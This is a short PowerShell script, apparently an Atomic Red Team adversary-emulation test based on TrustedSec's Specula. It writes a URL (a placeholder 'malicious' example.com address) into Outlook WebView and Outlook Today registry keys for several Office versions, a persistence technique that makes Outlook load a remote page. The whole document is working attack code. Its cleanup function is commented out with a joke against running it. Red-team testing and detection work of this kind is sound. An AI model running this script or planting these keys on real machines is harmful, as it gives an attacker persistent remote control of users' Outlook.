ref - https://github.com/trustedsec/specula

Atomic-Specula-reg.ps1

# Atomic Red Team Test: Add URL to Outlook WebView Registry Keys
# Description: This test adds a URL to various Outlook WebView registry keys, which could be used for persistence.
# MITRE ATT&CK Technique: T1112 - Modify Registry

$url = "https://example.com/malicious"
$officeVersions = @("16.0", "15.0", "14.0")
$folders = @("Inbox", "Calendar", "Contacts", "Deleted Items", "Drafts", "Journal", "Junk E-mail", "Notes", "Outbox", "RSS", "Sent Mail", "Tasks", "Today")

foreach ($version in $officeVersions) {
    foreach ($folder in $folders) {
        $path = "HKCU:\Software\Microsoft\Office\$version\Outlook\WebView\$folder"
        
        if ($folder -eq "Today") {
            $path = "HKCU:\Software\Microsoft\Office\$version\Outlook\Today"
        }

        if (!(Test-Path $path)) {
            New-Item -Path $path -Force | Out-Null
        }

        Set-ItemProperty -Path $path -Name "URL" -Value $url -Type String
        Write-Host "Added URL to: $path"
    }
}

Write-Host "Test completed. URL added to all specified registry keys."

# Cleanup function
function Cleanup {
    foreach ($version in $officeVersions) {
        foreach ($folder in $folders) {
            $path = "HKCU:\Software\Microsoft\Office\$version\Outlook\WebView\$folder"
            
            if ($folder -eq "Today") {
                $path = "HKCU:\Software\Microsoft\Office\$version\Outlook\Today"
            }

            if (Test-Path $path) {
                Remove-ItemProperty -Path $path -Name "URL" -ErrorAction SilentlyContinue
                Write-Host "Removed URL from: $path"
            }
        }
    }
    Write-Host "Cleanup completed. URLs removed from all specified registry keys."
}

# Uncomment to do a cleanup, but who wants to do that?
# Cleanup